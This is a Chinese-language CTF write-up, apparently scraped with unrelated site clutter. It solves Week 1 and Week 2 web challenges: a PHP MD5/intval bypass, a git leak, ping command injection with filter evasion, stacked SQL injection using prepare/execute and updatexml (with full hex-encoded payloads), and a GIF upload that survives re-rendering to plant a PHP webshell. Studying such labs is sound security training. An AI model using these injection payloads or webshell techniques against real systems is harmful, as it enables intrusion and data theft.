当前位置: 首页 > news >正文

有关网站建设的书怎样新建一个网页

有关网站建设的书,怎样新建一个网页,做酒招代理的网站,做网站提成文章目录 [Week 1]signinbaby_phphello_httprepo_leakping [Week 2]ez_sqli方法一#xff08;十六进制绕过#xff09;方法二#xff08;字符串拼接#xff09; ez_upload [Week 1] signin 打开题目#xff0c;查看下js代码 在main.js里找到flag baby_php ?php /… 文章目录 [Week 1]signinbaby_phphello_httprepo_leakping [Week 2]ez_sqli方法一十六进制绕过方法二字符串拼接 ez_upload [Week 1] signin 打开题目查看下js代码 在main.js里找到flag baby_php ?php // flag in flag.php highlight_file(__FILE__);if (isset($_GET[a]) isset($_GET[b]) isset($_POST[c]) isset($_COOKIE[name])) {$a $_GET[a];$b $_GET[b];$c $_POST[c];$name $_COOKIE[name];if ($a ! $b md5($a) md5($b)) {if (!is_numeric($c) $c ! 1024 intval($c) 1024) {include($name..php);}} } ? 简单分析一下参数a和b值不相等但MD5相等参数c不为数字不等于1024且转换为整数时等于1024参数name为伪协议 得到flag hello_http 就是一些基本的http请求知识 按照要求来得到flag repo_leak 打开题目提示git泄露 使用工具 先运行工具GitHack再访问./.git/ 但是这里提取不到要用到另外一个工具git_extractpython2环境我这里两个版本都下了 然后在posts文件夹找到得到flag ping 打开题目发现是ping命令 查看页面源码发现存在前端检测所以命令执行要bp抓包和告诉我们hint 访问一下得到源码 ?phpfunction sanitize($s) {$s str_replace(;, , $s);$s str_replace( , , $s);$s str_replace(/, , $s);$s str_replace(flag, , $s);return $s; }if (isset($_GET[source])) {highlight_file(__FILE__);die(); }if (!isset($_POST[ip])) {die(No IP Address); }$ip $_POST[ip];$ip sanitize($ip);if (!preg_match(/((\d{1,2}|1\d\d|2[0-4]\d|25[0-5])\.){3}(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])/, $ip)) {die(Invalid IP Address); }system(ping -c 4 .$ip. 21);? 分析一下过滤了分号空格斜杠flag。分号我们用%0a代替空格用%09代替斜杠利用cd …;cd…;cd…代替flag直接反斜杠绕过 bp抓包添加命令得到flag [Week 2] ez_sqli 源码 from flask import Flask, render_template, request import MySQLdb import reblacklist [select, update, insert, delete, database, table, column, alter, create, drop, and, or, xor, if, else, then, where]conn MySQLdb.connect(hostdb, port3306, userroot, passwdroot, dbctf)app Flask(__name__)app.route(/) def index():field request.args.get(order, id)field re.sub(r\s, , field)for s in blacklist:if s.lower() in field.lower():return s are bannedif not re.match(rid|name|email, field):field idwith conn.cursor() as cursor:cursor.execute(SELECT * FROM userinfo order by %s % field)res cursor.fetchall()return render_template(index.html, resres)if __name__ __main__:app.run(host0.0.0.0, port8000, debugTrue)分析一下 首先是过滤了很多查询用的关键字然后是禁用了空格大小写绕过上传参数值匹配id|name|email最后就是查询语句cursor.execute(SELECT * FROM userinfo order by %s % field) 这里的cursor.execute()是可以执行多条语句我们可以使用堆叠注入然后hint提示我们考点为预处理语句 set id1; prepare stmt from SELECT * FROM users WHERE id?; execute stmt using id;由于这里没有禁用报错注入的函数我们用updatexml去回显 payload id;set aselect updatexml(1,concat(0x7e,(select substr((select flag from flag),1,31)),0x7e),3);prepare ctf from a;execute ctf;方法一十六进制绕过 id;set/**/a0x73656C65637420757064617465786D6C28312C636F6E63617428307837652C2873656C65637420737562737472282873656C65637420666C61672066726F6D20666C6167292C312C333129292C30783765292C3329;prepare/**/ctf/**/from/**/a;execute/**/ctf;然后查后面那一段 id;set aselect updatexml(1,concat(0x7e,(select substr((select flag from flag),32,99)),0x7e),3);prepare ctf from a;execute ctf;十六进制绕过 id;set/**/a0x73656C65637420757064617465786D6C28312C636F6E63617428307837652C2873656C65637420737562737472282873656C65637420666C61672066726F6D20666C6167292C33322C393929292C30783765292C3329;prepare/**/ctf/**/from/**/a;execute/**/ctf;得到后面一段flag 方法二字符串拼接 payload相同 id;set/**/aconcat(sel,ect/**/updat,exml(1,concat(0x7e,(sel,ect/**/substr((sel,ect/**/flag/**/from/**/flag),1,31)),0x7e),3));prepare/**/ctf/**/from/**/a;execute/**/ctf;也能得到flag ez_upload 给了题目附件我们主要看下upload源码 ?php error_reporting(0); session_start();$user_dir uploads/.md5($_SERVER[REMOTE_ADDR])./;if (!file_exists($user_dir)) {mkdir($user_dir); }switch ($_FILES[file][type]) {case image/gif:$source imagecreatefromgif($_FILES[file][tmp_name]);break;case image/jpeg:$source imagecreatefromjpeg($_FILES[file][tmp_name]);break;case image/png:$source imagecreatefrompng($_FILES[file][tmp_name]);break;default:die(Invalid file type!); }$ext pathinfo($_FILES[file][name], PATHINFO_EXTENSION); $filepath $user_dir.md5($_FILES[file][name])...$ext;switch ($_FILES[file][type]) {case image/gif:imagegif($source, $filepath);break;case image/jpeg:imagejpeg($source, $filepath);break;case image/png:imagepng($source, $filepath);break;default:die(Invalid file type!); }echo Upload avatar success! Path: .$filepath;$_SESSION[avatar] $filepath; ?简单分析一下首先会检测MIME类型是否正确然后经过二次渲染上传到指定路径 我们这里用的是gif我们先上传一下 然后打开010观察上传后的图片和之前对比哪里是不变的 然后在不会被二次渲染改变的地方添加一句话木马 这里我最初上传的gif带一句话木马刚好没被改就不用再添加一句话木马了 上传图片然后bp抓包修改文件后缀为php 访问命令执行得到flag
http://www.hkea.cn/news/14534756/

相关文章:

  • 龙潭古镇网站建设网站怎么做才不会被墙
  • 海南省建设网站专业创业服务平台网站建设需求
  • 国际网站空间ps做网站宽度
  • 网站建设幻灯片背景图片素材广州招投标交易中心
  • 重庆教育建设有限公司网站首页做英文网站
  • 怎样做关键词网站品牌网站开发设计
  • 郑州企业建站系统模板有域名了怎么建立网站
  • 杭州百度整站优化服务淄博企业网站建设
  • 专业外贸网站安装wordpress报错
  • 西安做网站找缑阳建男女之间做那个的网站
  • 国内专业网站制作公司手机可以登录国家开发银行网站吗
  • 营销型手机网站东莞网站建设+旅游
  • 用商标域名注册的非盈利网站wordpress婚纱摄影主题
  • wordpress阿里云建站起飞页自助建站平台的特点
  • php网站建设到护卫神wordpress 强密码 弱
  • 百色做网站wordpress 萌化主题
  • 关注网站建设设计网页公司哪家好
  • 郑州冬青街 网站建设潍坊新闻头条最新消息
  • 河北网站制作多少钱武隆网站建设公司
  • 郑州手机网站搭建溧水网站建设
  • 免费的个人网站怎么做灰产项目网
  • 网站定制项目台州网页设计招聘信息
  • 网站开发环境windows7的优点企业站群cms
  • 免费推广网站入口2020江西新余网站建设
  • 网站建设语言都有什么遵义做网站
  • 网站后台html5模板网站都有什么类型的
  • cms 导航网站小企业如何建网站
  • 会计做帐模板网站互联网品牌有哪些
  • 怎么做网站发货广告投放形式有哪些
  • 物流网站免费源码广州商旅网站制作